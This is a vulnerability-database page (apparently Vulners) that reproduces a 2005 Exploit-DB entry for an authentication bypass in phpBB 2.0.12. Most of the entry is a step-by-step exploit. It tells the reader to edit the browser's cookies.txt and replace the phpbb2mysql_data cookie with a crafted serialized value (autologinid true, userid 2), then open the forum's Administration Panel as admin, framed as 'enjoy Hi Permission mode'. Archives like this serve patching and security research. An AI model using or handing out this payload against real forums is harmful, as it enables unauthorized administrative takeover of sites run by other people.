Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

phpBB 2.0.12 - Session Handling Authentication Bypass

🗓️ 11 Mar 2005 00:00:00Reported by Ali7Type 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 82 Views

phpBB 2.0.12 allows authentication bypass via cookie manipulation for easy exploitation.

Code
phpBB 2.0.12 Session Handling Authentication Bypass ..
 
easy to use exploit ..
 
** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..
 
1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:
 
3- Close the Browser ..
 
2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example ;)
 
and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor
 
3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//
 
save the cookies.txt..
 
4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !! :D
 
complete the mission by clicking " Go to Administration Panel "
 
--------------------------------------------------------------------------------
 
written by : Ali7
e-mail : [email protected]

# milw0rm.com [2005-03-11]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Mar 2005 00:00Current
7.4High risk
Vulners AI Score7.4
phpbb session handling authentication bypass exploitcookie manipulationeasy exploitno registration required
82